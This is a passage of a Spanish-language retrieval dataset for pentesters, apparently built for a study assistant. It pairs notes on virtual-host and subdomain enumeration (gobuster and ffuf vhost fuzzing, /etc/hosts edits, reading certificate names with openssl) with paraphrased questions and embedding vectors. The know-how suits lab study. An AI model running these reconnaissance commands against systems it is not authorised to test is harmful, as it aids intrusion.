0.02918, -0.03607, -0.00821, 0.00677, -0.00798, -0.02672, -0.06704, 0.07403, -0.12131, 0.03285, -0.0608, 0.01027, -0.07007, -0.12448, -0.01852, -0.14911, -0.03844, 0.09793, -0.18044, 0.16771, -0.0884, 0.06375, 0.00302, -0.06433, -0.05983, 0.06562, 0.00694, 0.07102, -0.05781, 0.02774, -0.03196, -0.14702, -0.02709, 0.02982, -0.00721, 0.04803, 0.00196, 0.01382, 0.06083, -0.01078, 0.05648, 0.06706, 0.00587, -0.05199, 0.01979, -0.08921, 0.09126, -0.04659, -0.12698, 0.0303, 0.01865, -0.01105, -0.0595, 0.07315, 0.02827, 0.00893, 0.0452, 0.1118, -0.09739, 0.09856, 0.02354, -0.07902, 0.0208, -0.01652, 0.03035, -0.1668, 0.11803, -0.07797, 0.00089, 0.04486, -0.05742, 0.00423, -0.07242, 0.00954, 0.01846, -0.06428, 0.04008, 0.04129, -0.03323, 0.04439, -0.00215, 0.06582, -0.06336, -0.05995, 0.05326, -0.02491, -0.04427, 0.10751, -0.00019, -0.02056, 0.02941, 0.06204, 0.01945, -0.04263, -0.08189, -0.07954, -0.01414, -0.02576, 0.03205, 0.04155, 0.00718, -0.02932, -0.00305, -0.01485, 0.04789, -0.01136, -0.13552, 0.09096, 0.00545, 0.08098, -0.08059, -0.04085, -0.05298, -0.0242, 0.05446, 0.05174, -0.00222, -0.0596, 0.00686, -0.03013, -0.09227, -0.09799, 0.0356, 0.05564, 0.01191, -0.04131, -0.06748, -0.0265, -0.01769, -0.02852, -0.05388, 0.02846, -0.01072, -0.0018, 0.01015, -0.05807, -0.02024, 0.00394, 0.04919, -0.01712, -0.10531, 0.03407, -0.04043, -0.05368, 0.0263, 0.04816, 0.00607, 0.02167, 0.02035, 0.06632, 0.00507, -0.01221, -0.03355, 0.0508, -0.04934, -0.0792, 0.06395, -0.04908, -0.07815, -0.00427, -0.0217, 0.06097, -0.05314, -0.06611, 0.01661, 0.00401, -0.05698, -0.06387, -0.00331, 0.0398, -0.06003, -0.00522, 0.01931, 0.04324, -0.04172, 0.03389, -0.07394, -0.06992, 0.04188, -0.03642, -0.02057, -0.00517, -0.02447, 0.03418, -0.028, 0.01701, 0.02689, 0.01162, 0.01865, 0.03381, 0.1004, -0.02421, -0.06011, -0.0639, -0.04083, 0.01013, 0.03047, 0.04744, -0.01711, 0.02188, 0.01885, -0.05616, -0.01801, 0.04737, 0.08476, 0.03014, -0.05855, -0.00971, -0.04599, -0.10873, 0.03543, -0.00438, -0.08335, -0.05142, -0.00404, 0.04292, -0.0462, 0.01148, -0.02511]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzear vhosts\n```bash\ngobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n```", "indexar": "quΓ© herramienta sirve para probar diferentes nombres de dominio en un servidor web?", "v": [-0.00144, 0.06173, -0.14603, -0.17991, -0.05352, -0.11255, 0.03459, -0.13705, -0.0222, -0.06447, -0.01121, -0.06469, 0.02854, -0.21018, 0.01724, 0.04782, 0.27241, -0.13306, 0.03229, -0.00423, 0.01456, -0.00976, -0.08847, -0.02994, -0.1037, -0.11142, 0.05186, -0.07531, -0.07334, 0.13265, -0.02863, -0.07127, 0.0686, -0.0583, -0.08277, -0.03829, 0.04057, 0.04168, 0.01763, 0.10798, 0.03986, -0.03181, -0.10266, 0.05102, -0.05794, 0.04261, -0.0718, -0.05287, 0.03508, -0.05867, -0.02056, -0.11895, -0.11012, -0.0312, -0.01562, -0.05472, 0.13004, -0.16087, 0.01877, -0.04656, -0.15591, -0.06315, -0.04198, 0.00211, 0.00112, -0.10044, -0.07796, -0.0125, -0.06249, -0.02211, -0.02309, 0.02605, 0.0615, -0.0627, 0.0606, -0.04, 0.07861, 0.00078, 0.06462, -0.01664, 0.06686, 0.02426, -0.11054, 0.04605, -0.12403, -0.09882, -0.0118, -0.06676, 0.07718, -0.01869, 0.10062, 0.13351, -0.05491, 0.05718, 0.0025, -0.02253, 0.14292, -0.07201, -0.01176, -0.07063, 0.16402, 0.07121, -0.09413, 0.04899, 0.01528, 0.12001, 0.03096, -0.05685, -0.02764, -0.02325, 0.03646, -0.03493, -0.09562, 0.032, -0.02673, 0.01748, -0.01112, -0.02859, 0.02132, -0.02892, -0.06052, 0.01482, 0.01629, 0.02334, -0.00415, -0.01711, 0.04768, -0.02607, -0.01163, -0.1147, 0.00253, -0.04127, -0.06829, 0.0013, 0.00074, 0.03445, 0.10187, -0.05622, -0.02742, -0.05891, 0.00828, 0.03567, -0.08864, -0.04518, 0.04266, 0.00971, 0.12334, -0.05974, -0.05778, 0.01682, -0.04331, -0.0571, -0.05833, 0.05168, -0.11991, -0.02091, -0.08753, -0.02905, -0.0899, 0.03824, -0.05031, -0.00159, 0.0138, 0.07211, 0.02382, -0.01737, 0.01513, 0.01145, 0.07395, 0.05804, 0.0236, 0.07611, 0.00198, -0.03116, 0.01568, -0.02042, -0.08695, -0.02778, -0.01413, -0.03799, -0.05273, -0.03607, -0.02508, 0.04568, -0.01245, -0.00141, 0.01824, -0.0285, -0.0327, 0.04909, 0.00837, 0.05755, -0.08882, -0.00775, 0.03282, 0.00611, 0.02506, -0.08496, 0.02323, -0.03452, -0.02351, -0.08037, -0.02235, -0.02444, -0.02736, 0.00515, -0.01617, -0.0197, 0.00994, -0.00105, -0.00685, -0.00914, 0.05862, -0.03302, -0.02092, -0.03967, 0.00358, -0.01834, -0.03465, -0.03363, -0.04008, -0.00783, 0.01164, 0.00417, 0.00949, 0.07371, 0.04307, -0.04745, 0.02395, -0.02007, 0.00377, 0.00139, -0.0304, -0.02664, 0.01526, -0.04826, 0.04209, -0.00751, -0.07058, -0.02892, -0.06254, 0.06871, 0.00648, -0.02178, -0.0375, -0.11167, -0.00581, -0.01297, -0.06791, -0.0286, -0.05056, -0.0067, 0.0147, 0.00052, 0.00714, 0.00947]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## Fuzzear vhosts\n```bash\ngobuster vhost -u http://IP -w /usr/share/seclists/Discovery/DNS/...\nffuf -H \"Host: FUZZ.objetivo.htb\" -u http://IP\n```", "indexar": "cΓ³mo puedo encontrar direcciones IP ocultas que no estΓ‘n registradas?", "v": [0.19356, 0.15387, -0.15548, -0.02348, 0.11422, -0.14783, 0.05812, -0.06783, -0.11817, -0.0561, 0.03841, -0.10486, 0.0068, -0.08552, 0.05275, 0.05327, 0.03732, 0.00527, 0.0303, -0.08812, -0.03615, 0.03077, -0.04528, 0.04218, -0.05026, 0.04521, -0.02337, 0.04678, -0.08268, -0.15294, -0.05063, -0.08415, -0.08894, 0.02003, -0.12188, -0.07222, -0.02391, 0.01808, -0.04492, 0.03092, 0.05926, -0.00348, -0.0723, -0.01655, 0.09342, 0.0398, -0.02178, -0.01479, -0.02416, -0.11888, -0.17553, -0.09374, -0.1154, -0.04329, -0.09994, -0.0361, 0.06822, 0.06666, 0.06798, 0.0164, 3e-05, 0.09028, -0.01157, 0.0635, 9e-05, -0.0666, -0.02193, 0.01477, -0.05863, -0.07898, 0.04063, 0.03371, -0.05817, 0.01883, 0.10023, 0.04564, 0.0319, -0.08342, -0.00263, 0.03842, -0.00576, 0.01465, -0.08265, 0.0737, -0.09479, 0.00537, -0.04037, -0.10008, -0.05706, -0.14031, 0.0901, 0.06488, -0.06595, 0.021, 0.0836, -0.02187, 0.05904, 0.02673, -0.03431, 0.03801, -0.01287, 0.09561, -0.09753, 0.10204, 0.09619, 0.13177, 0.0393, -0.02911, 0.08041, -0.01131, -0.06154, 0.01007, -0.02589, -0.0964, 0.0278, 0.04652, -0.01182, -0.05417, 0.07817, -0.0151, -0.05477, -0.01225, -0.03653, 0.01912, -0.00243, 0.01784, -0.05331, 0.08532, 0.03818, -0.02563, -0.03283, -0.07236, -0.05266, -0.0188, 0.02154, 0.088, -0.0436, 0.06806, 0.02774, 0.05649, 0.09022, -0.04033, -0.00396, -0.10476, 0.04213, -0.05729, 0.01187, -0.07616, -0.07284, -0.00622, 0.03527, 0.02857, 0.03306, 0.09001, -0.02834, 0.11572, 0.00054, -0.13148, 0.01147, 0.01903, 0.01957, 0.04597, -0.06417, -0.0469, 0.04773, -0.01425, -0.10337, 0.02767, 0.08231, -0.03468, -0.03646, 0.05455, -0.00749, -0.0673, -0.01031, -0.07415, 0.02399, -0.04897, 0.05086, -0.02214, -0.0167, 0.04388, 0.02819, -0.03564, 0.04913, 0.02125, 0.06218, -0.04209, 0.00933, 0.0835, 0.08384, 0.00496, -0.03647, 0.02984, -0.01608, -0.07879, -0.00359, -0.02798, 0.00536, -0.07995, -0.07061, -0.01096, -0.0796, -0.02688, 0.00463, -0.01174, -0.1104, 0.02186, -0.02708, 0.01415, 0.03271, -0.05618, 0.04738, -0.14293, -0.08296, -0.00044, -0.03323, -0.08177, -0.00345, -0.00867, -0.00101, 0.01648, 0.05286, -0.03401, 0.0463, -0.02326, -0.0065, 0.03975, 0.03746, 0.06533, -0.0421, 0.08493, -0.08123, -0.03343, 0.07117, 0.00965, 0.00859, -0.02164, -0.04529, -0.00724, 0.04558, 0.08288, -0.0124, -0.02573, -0.05924, -0.07706, -0.08055, 0.0652, 0.03173, -0.07908, -0.03411, 0.02724, 0.08491, -0.00945, 0.0499, -0.09664]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "que programa hay para editar archivos de configuraciΓ³n como /etc/hosts", "v": [0.143, 0.03529, -0.01811, -0.23038, 0.07124, -0.08518, 0.02088, -0.05138, -0.05568, -0.06635, -0.11254, -0.10803, 0.02272, -0.04272, 0.00597, -0.06321, 0.16388, -0.10802, 0.08186, 0.06716, -0.0881, 0.15919, 0.01478, 0.08956, -0.05734, -0.05977, 0.09565, 0.05975, -0.16722, -0.00238, -0.00564, -0.04306, 0.02937, -0.05688, 0.02304, 0.06973, 0.097, 0.0233, -0.06986, 0.09283, 0.01895, -0.03791, 0.04889, 0.08303, 0.00544, -0.05372, 0.0915, -0.01047, 0.07255, -0.06499, 0.11174, -0.01149, 0.01579, 0.04387, 0.09779, -0.0553, -0.06914, -0.20877, -0.1055, 0.0172, -0.02718, 0.11198, -0.01477, 0.04467, -0.01696, 0.09726, -0.02536, -0.03511, -0.13214, 0.07989, 0.00116, 0.01711, 0.07079, -0.00186, 0.00787, -3e-05, 0.00811, -0.04211, 0.00307, -0.02566, -0.04403, 0.04269, 0.00902, 0.08257, -0.13718, -0.05969, 0.01873, -0.03313, -0.03329, -0.04529, 0.03724, -0.02202, 0.06729, 0.04048, 0.06442, -0.13074, 0.17018, 0.06455, 0.04947, 0.00504, 0.01674, -0.00117, -0.00727, 0.21793, -0.02819, 0.09517, 0.10105, -0.01002, -0.02767, 0.01463, 0.06589, 0.05079, 0.04947, 0.01141, -0.08542, -0.07039, 0.02223, -0.01883, 0.03407, -0.10526, -0.11172, 0.04557, 0.03994, 0.04045, 0.11399, 0.05916, 0.02897, 0.08572, -0.02361, 0.16399, 0.00797, -0.05039, 0.00888, 0.01241, -0.09889, -0.04204, 0.00746, -0.01017, -0.03747, -0.03073, 0.05061, 0.06625, 0.037, 0.05616, 0.10576, -0.01954, -0.02754, -0.06376, -0.02876, 0.02519, 0.0063, 0.0381, 0.00882, -0.03488, -0.10312, -0.00477, -0.02657, -0.07946, -0.0439, 0.0297, -0.07535, -0.0713, -0.0521, -0.0772, 0.03862, -0.02671, 0.05327, 0.06612, 0.08023, 0.0333, -0.00505, 0.01272, 0.02546, -0.04337, -0.02619, 0.055, -0.00915, -0.07198, 0.07085, -0.02194, -0.0133, -0.01291, 0.07074, 0.04932, -0.00734, 0.0215, 0.0138, 0.07889, -0.04057, -0.04763, -0.03297, 0.01586, 0.01198, -0.0162, -0.00177, -0.01787, -0.06737, 0.00116, -0.02233, -0.00843, 0.00523, -0.02188, 0.0501, 0.02439, 0.04687, 0.04657, -0.03082, -0.01567, 0.09479, 0.05795, -0.01946, -0.01598, 0.02165, 0.01291, 0.00247, 0.04078, -0.02942, 0.08961, 0.12474, 0.00304, 0.03528, 0.01773, 0.01482, 0.0485, 0.00337, -0.0813, 0.01405, 0.01843, 0.05918, -0.03005, -0.00705, -0.05471, 0.00276, 0.02004, 0.02533, -0.01294, 0.02104, -0.02931, 0.03821, -0.04089, -0.04385, 0.04748, 0.05566, -0.07881, -0.01768, 0.02734, -0.02237, -0.00329, 0.01588, 0.04259, -0.01688, 0.02108, -0.00393, -0.03609, 0.01405, 0.04487]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "con que puedo aΓ±adir manualmente dominios a la lista de resoluciΓ³n local", "v": [0.22805, 0.198, -0.10362, -0.00437, 0.03455, -0.02804, 0.11313, -0.02638, -0.21927, -0.03706, -0.04896, -0.16881, 0.0024, -0.17882, -0.02414, -0.07005, 0.07846, -0.07055, -0.08573, -0.04547, -0.00365, -0.10705, -0.05348, 0.07197, 0.08126, -0.05733, 0.07017, -0.10254, -0.0987, 0.07752, 0.0725, -0.0143, -0.05822, 0.00649, 0.00528, -0.08122, 0.009, 0.05398, -0.04287, -0.00499, 0.0178, 0.05692, -0.13467, 0.0836, -0.1283, -0.01823, -0.00897, 0.05843, -0.01637, -0.09892, -0.05722, -0.01082, -0.05395, -0.05561, 0.051, -0.05682, 0.2005, -0.05357, 0.01105, -0.04282, -0.09043, -0.00128, -0.04654, 0.05137, 0.02592, -0.00648, -0.01071, -0.02647, 0.00801, 0.05736, -0.00359, -0.00456, 0.04309, 0.01043, 0.03017, 0.02676, -0.00519, -0.0178, 0.11092, -0.03996, 0.02528, -0.09161, -0.06779, -0.0112, -0.07963, -0.16447, -0.09174, -0.11584, 0.05245, -0.09295, 0.05379, -0.07579, -0.04451, -0.0255, 0.03755, -0.04616, 0.09482, 0.12448, -0.02091, 0.02894, 0.10857, 0.04159, -0.03797, 0.11272, 0.182, 0.05778, 0.03794, -0.01455, 0.02286, -0.01402, -0.02017, -0.0144, -0.051, -0.01488, -0.09778, 0.02669, -0.06845, 0.02187, -0.04274, 0.02623, -0.07157, -0.12444, 0.02912, -0.04885, -0.0058, -0.00988, -0.03261, 0.07032, -0.04516, -0.06399, 0.00255, 0.04343, -0.00449, -0.0616, -0.0231, 0.04153, -0.00193, 0.03576, 0.00401, -0.00129, -0.01132, 0.01406, 0.02516, -0.02027, 0.04035, -0.05289, -0.06942, -0.05886, -0.03913, 0.00832, 0.02042, -0.01308, 0.00117, 0.10939, 0.00439, 0.08443, 0.02156, 0.0041, 0.00818, 0.06974, -0.01602, 0.04336, -0.0458, 0.04073, -0.00959, -0.0408, -0.0144, 0.00967, 0.05919, -0.00075, -0.08969, 0.06299, -0.11032, -0.01226, 0.01328, 0.00453, 0.01342, 0.01905, 0.03315, 0.03136, 0.0038, 0.00118, -0.0097, 0.04052, -0.02734, -0.01618, 0.02787, -0.0477, 0.01399, 0.05337, 0.00286, 0.04046, -0.04633, 0.03939, 0.00672, 0.00891, -0.00016, -0.00181, -0.06864, -0.06173, -0.01766, 0.0305, -0.00509, -0.01896, 0.01618, 0.08204, -0.05061, 0.09107, 0.02265, -0.00218, -0.03143, -0.0685, 0.09104, -0.01078, -0.03273, 0.02339, -0.0037, -0.086, -0.03183, -0.01077, -0.00154, -0.00671, 0.0913, -0.04906, 0.00626, 0.03658, 0.1212, 0.02419, 0.06277, 0.05572, -0.05116, 0.05501, 0.01639, -0.08234, 0.08091, 0.03634, 0.03295, -0.02066, -0.03497, 0.01916, 0.02609, 0.08358, -0.01647, -0.03286, -0.07713, -0.0939, -0.10132, 0.0202, 0.05086, -0.05564, -0.0311, 0.06264, 0.05164, -0.00327, 0.0009, -0.04066]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## /etc/hosts\n- Si la web carga rara o redirige, mira el header `Host:`.\n- **AΓ±ade el dominio a `/etc/hosts` SIEMPRE** que aparezca un hostname.", "indexar": "cual es una alternativa libre a los editores de texto para modificar registros del sistema", "v": [0.08744, 0.06114, -0.01003, -0.13267, 0.0705, -0.0286, -0.0622, -0.08687, -0.17344, -0.0689, -0.09202, -0.12865, 0.04539, -0.1181, 0.15537, -0.05488, 0.13011, -0.09496, 0.08442, -0.04655, 0.01545, -0.14526, -0.04194, -0.01013, -0.07443, -0.0825, -0.01853, -0.07235, -0.05485, 0.06311, -0.06368, 0.02638, 0.04479, -0.04159, -0.04197, 0.04999, 0.10032, 0.06684, -0.03715, 0.09541, 0.05025, 0.01751, -0.04839, 0.06239, -0.03268, -0.09912, -0.00983, 0.08485, -0.01003, 0.06082, 0.01603, -0.00809, -0.14549, -0.0219, 0.01769, -0.026, 0.20225, -0.11168, -0.0572, -0.00906, -0.04011, 0.15527, -0.03468, -0.04013, -0.01622, -0.01395, -0.02231, -0.13587, -0.07428, 0.13602, 0.08577, -0.00445, 0.08149, -0.05681, -0.07454, 0.0723, -0.03193, -0.13759, -0.07134, 0.06814, -0.04094, -0.0596, -0.04107, 0.0949, 0.02171, -0.04741, -0.04709, -0.15181, -0.10452, 0.02897, 0.10618, -0.01978, 0.04347, 0.06186, 0.06124, -0.05316, 0.08409, -0.03674, -0.00276, 0.12148, 0.08691, -0.00359, -0.06268, 0.06704, -0.03767, -0.05939, 0.01575, -0.00854, 0.02986, -0.03375, 0.02156, 0.05232, -0.01275, 0.02762, 0.01118, -0.02356, 0.0443, 0.04964, 0.00812, -0.07028, -0.06876, 0.01115, -0.05406, -0.09558, 0.08383, 0.04908, 0.01839, 0.05536, 0.00237, 0.07498, 0.04158, -0.02639, -0.09957, -0.06002, -0.07354, -0.00645, 0.01934, 0.05811, 0.06759, 0.01029, -0.09267, 0.05986, -0.03541, -0.02379, 0.04642, -0.03512, 0.02826, -0.06835, -0.08815, -0.08429, -0.07142, -0.00566, -0.0573, 0.05384, -0.04964, 0.06812, 0.00631, -0.03393, -0.08563, 0.0181, -0.01655, -0.04461, 0.01157, -0.02878, 0.01237, -0.03615, 0.01186, -0.06961, 0.03535, -0.06939, -0.01518, 0.02931, 0.08776, -0.03889, 0.11583, -0.00139, -0.07836, -0.0234, 0.02017, 0.05837, -0.03128, 0.05915, -0.04037, -0.0225, -0.00948, -0.02907, 0.02342, 0.02522, 0.00387, 0.02458, 0.02635, 0.07221, -0.0317, -0.12541, 0.0065, 0.01414, -0.0436, -0.06046, 0.04796, -0.02863, -0.07738, -0.01358, 0.03311, -0.05285, 0.03525, -0.00823, -0.03331, 0.03492, 0.04295, 0.07687, 0.01971, 0.01541, 0.0381, 0.04483, -0.09718, 0.0251, -0.02564, -0.0175, 0.03919, -0.04315, 0.12324, 0.00776, 0.05353, -0.01972, 0.00998, -0.04455, 0.02494, 0.06591, -0.02775, 0.03535, -0.04624, -0.05533, -0.03706, 0.02922, 0.04024, 0.02589, 0.0418, 0.02628, -0.01557, -0.05103, 0.06031, 0.09295, -0.02524, -0.01257, -0.04762, -0.03581, -0.09432, -0.01184, -0.04701, -0.0552, -0.03668, 0.00319, 0.03857, -0.07168, 0.05783, -0.0545]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "cual es una alternativa libre a openssl para revelar los hostnames ocultos en un certificado?", "v": [0.27582, -0.08791, -0.12722, 0.00172, 0.03607, -0.13118, -0.06252, -0.07649, -0.01242, -0.05523, -0.13369, -0.18645, 0.01855, 0.01614, 0.09386, -0.03748, 0.11678, -0.08595, 0.05686, 0.08216, -0.04926, -0.02667, -0.11851, -0.08969, -0.003, -0.08179, 0.00772, 0.07116, -0.08024, -0.05518, 0.04311, -0.04257, -0.05737, 0.06092, -0.01585, 0.09474, -0.00325, 0.00814, 0.07658, 0.00486, 0.0747, -0.04925, 0.04939, 0.18539, -0.02648, -0.03899, -0.07206, 0.05397, 0.05666, -0.05761, -0.07322, -0.14495, -0.23194, -0.04568, 0.04813, 0.00154, 0.06142, -0.03442, 0.0153, -0.01705, -0.06995, -0.06351, 0.07719, -0.00132, 0.00429, -0.03246, -0.04262, 0.13556, -0.13513, 0.04408, 0.09991, 0.04474, 0.05773, 0.00369, -0.01551, 0.02266, -0.01624, -0.09988, 0.01865, 0.05839, 0.04466, -0.06121, 0.06092, 0.03982, -0.0943, -0.06371, -0.05145, -0.01592, 0.03584, 0.00633, 0.08493, 0.07413, -0.02025, 0.07852, 0.00101, -0.10042, 0.10111, 0.00184, -0.08456, -0.02227, 0.01053, 0.12905, -0.07657, 0.07046, 0.05499, 0.05485, -0.02905, -0.03374, -0.03834, 0.02771, 0.09356, 0.07603, -0.05056, 0.0001, 0.00078, -0.06079, 0.00058, -0.00471, 0.0664, 0.01742, -0.07167, -0.12897, -0.05418, 0.00847, 0.02084, 0.03992, -0.06199, -0.00223, -0.03434, -0.02885, -0.01082, -0.07014, -0.06566, -0.01199, -0.09908, 0.00232, 0.01893, -0.06506, 0.00271, 0.03743, 0.01238, -0.02801, 0.00403, -0.00794, 0.12445, 0.00231, -0.04907, -0.03117, -0.00701, -0.03448, -0.10364, 0.09027, -0.0268, 0.08112, -0.09894, -0.02838, -0.06284, -0.08923, -0.08412, 0.13578, 0.00457, -0.0181, -0.04033, -0.01532, -0.02122, 0.03689, 0.00569, 0.01486, -0.02068, -0.02502, 0.06559, 0.07073, 0.01666, -0.07707, 0.07079, -0.03983, 0.03125, -0.14359, 0.00935, -0.05669, 0.03942, 0.02911, 0.02723, -0.00781, 0.03712, 0.00482, 0.03513, -0.0515, -0.03289, 0.00921, -0.00247, -0.03606, -0.10839, 0.00848, -0.0686, -0.01769, 0.02714, -0.07399, -0.00879, -0.07584, -0.05715, -0.05189, -0.00102, -0.02017, -0.03277, -0.0172, -0.03739, 0.05482, -0.00273, 0.02403, 0.04242, -0.03984, 0.07671, -0.03302, -0.05618, 0.04424, -0.03267, 0.00383, -0.05317, -0.03185, 0.0531, -0.00239, 0.0298, -0.02015, 0.04949, 0.00732, 0.02952, 0.03938, -0.00079, -0.01439, 0.00348, -0.01655, -0.07107, 0.02249, 0.07478, -0.00181, -0.01338, 0.0272, -0.0246, 0.02595, 0.02697, 0.06918, 0.00293, -0.04569, 0.03573, -0.02017, -0.05849, 0.01284, -0.01491, -0.02476, -0.08113, 0.03694, 0.00177, -0.03422, 0.00181, -0.01844]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "que herramienta sirve para descubrir los dominios reales usando el campo CN o SAN de un HTTPS?", "v": [-0.0203, -0.11915, -0.10116, -0.0938, -0.00614, -0.20998, -0.04864, -0.0852, -0.0134, 0.08388, -0.1444, -0.11898, -0.05408, -0.16888, 0.00658, 0.03789, 0.13357, -0.02474, 0.01637, 0.00272, -0.05147, -0.08305, -0.0892, -0.04782, 0.01616, -0.10798, 0.03358, -0.01312, -0.11062, 0.06757, 0.08439, 0.03638, -0.03656, 0.05868, -0.11446, -0.10681, -0.10555, 0.11184, -0.03775, 0.05824, 0.0707, -0.00434, -0.14688, 0.08478, -0.12247, -0.02897, -0.06967, -0.15195, -0.02293, -0.09061, -0.02336, -0.10113, -0.21265, -0.014, -0.03754, -0.07831, 0.16462, -0.04856, -0.04808, -0.13032, -0.11322, -0.06893, -0.0093, -0.05325, 0.0695, -0.12711, 0.01532, 0.07714, -0.07584, 0.00483, -0.02176, 0.08012, 0.07, -0.015, 0.04694, -0.02448, 0.06263, -0.01322, 0.06379, -0.03945, 0.10431, -0.00837, -0.07998, 0.00909, -0.07201, -0.09894, -0.00019, -0.09672, 0.02793, -0.13145, 0.04842, 0.11964, -0.05194, -0.02941, -0.02379, -0.05888, 0.06108, -0.09303, 0.01384, 0.01748, 0.11383, 0.07471, -0.1192, 0.05324, 0.06945, 0.09018, 0.07238, -0.08479, -0.01023, -0.00697, 0.08331, -0.0464, -0.07353, -0.00418, -0.00553, 0.10032, -0.05057, -0.02212, 0.00268, -0.10401, -0.02648, -0.02836, -0.03347, -0.02147, -0.05042, -0.01588, -0.06944, -0.005, 0.00782, -0.05038, 0.01725, -0.04251, -0.08709, 0.02676, -0.04819, 0.01606, 0.06993, -0.10516, -0.05028, -0.03537, -0.05035, 0.03632, -0.08083, -0.06988, 0.02579, 0.02038, 0.01472, -0.04253, -0.03188, -0.00108, 0.04389, -0.03254, -0.0393, 0.0594, -0.02693, 0.0181, -0.0175, -0.0446, -0.14359, 0.07331, -0.03924, -0.04773, 0.02477, -0.00258, -0.02032, 0.00167, 0.00502, -0.01927, 0.06963, 0.03691, 0.0144, 0.03281, 0.02828, -0.06882, -0.05664, 0.01434, -0.04773, 0.03578, 0.02789, -0.05006, -0.006, -0.04701, -0.00691, 0.06872, -0.04116, 0.03431, 0.04994, -0.01806, -0.0075, 0.02034, 0.01695, 0.08, -0.00548, -0.01119, 0.04482, 0.02143, 0.00896, -0.05843, 0.01293, -0.02426, -0.03802, -0.00036, -0.00532, -0.0563, 0.0435, 0.01672, -0.00599, 0.02174, -0.05067, -0.04597, -0.00287, -0.05286, 0.04221, -0.03775, -0.00527, -0.02057, -0.00627, 0.02418, -0.05059, -0.0235, -0.02387, -0.00196, 0.01548, -0.0335, 0.04498, 0.05114, 0.02636, -0.01754, -0.02177, -0.01954, 0.00319, 0.00572, -0.03731, 0.05108, 0.05628, -0.04411, 0.0152, 0.00937, -0.06379, -0.00214, -0.02017, 0.01539, -0.0325, -0.01531, -0.03195, -0.0727, -0.07267, -0.07626, -0.02357, -0.03497, -0.02526, -0.02285, 0.05493, -0.03858, -0.0124, 0.01304]} -{"tipo": "pregunta", "herramienta": "Vhosts y subdominios", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Vhosts y subdominios.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## HTTPS revela hostnames\n```bash\nopenssl s_client -connect IP:443\n```\n- El **certificado** te puede chivar el dominio real (CN / SAN).\n\nRelacionado: EnumeraciΓ³n web Β· Nmap Β· OSCP MOC", "indexar": "con que puedo enumerar los nombres de hosts ocultos en la cadena de certificados sin usar comandos propietarios?", "v": [0.31798, 0.04665, -0.04766, -0.07191, 0.03116, -0.06291, 0.03573, -0.03585, -0.04952, -0.17571, -0.10332, -0.02897, -0.00601, -0.06001, 0.02372, 0.02885, 0.14537, -0.04675, 0.02826, 0.01776, 0.01215, -0.05299, -0.01913, 0.00235, -0.04397, 0.00594, 0.1281, -0.01023, -0.10004, 0.03215, 0.05586, -9e-05, -0.00466, 0.01336, -0.02258, 0.00341, -0.12213, -0.05966, 0.01016, 0.13454, 0.02451, 0.07328, -0.10204, -0.0427, 0.00881, -0.00079, -0.11658, 0.08379, -0.00187, -0.1439, -0.06848, -0.15581, -0.20436, -0.08423, -0.02009, -0.15279, 0.09954, 0.06927, 0.04048, 0.06446, -0.01515, -0.04292, 0.13047, 0.12933, -0.04495, -0.05438, -0.01375, 0.01223, -0.09518, -0.04701, -0.01439, 0.0385, -0.01619, 0.07763, 0.04919, 0.01529, 0.04281, -0.10569, 0.065, 0.04776, -0.02387, -0.07748, 0.00884, -0.05264, -0.04951, -0.07297, -0.09532, -0.04171, -0.03161, -0.07671, 0.05896, 0.04139, 0.06364, -0.03778, 0.07172, 0.01408, 0.10523, 0.02445, -0.00155, 0.00071, 0.01906, 0.10842, -0.05793, 0.15273, 0.02801, 0.11237, 0.05754, -0.08684, 0.05759, -0.00297, 0.01924, 0.01033, -0.08836, -0.03535, -0.05789, 0.01677, -0.04887, -0.11524, -0.01797, -0.01167, -0.09709, -0.0927, 0.0651, 0.09694, 0.08356, -0.02137, -0.04633, 0.059, 0.03888, -0.01758, -0.08809, 0.00571, 0.01363, -0.10315, -0.11282, 0.05249, -0.07552, 0.02691, -0.06479, -0.03314, -0.02117, 0.04313, -0.01711, 0.00649, 0.12845, 0.00255, -0.04634, -0.10357, -0.03904, 0.0062, -0.05783, 0.12195, -0.03421, 0.03128, -0.04158, -0.02889, 0.01414, -0.07306, -0.0224, 0.07962, -0.01782, -0.06498, -0.09144, 0.02656, -0.00024, 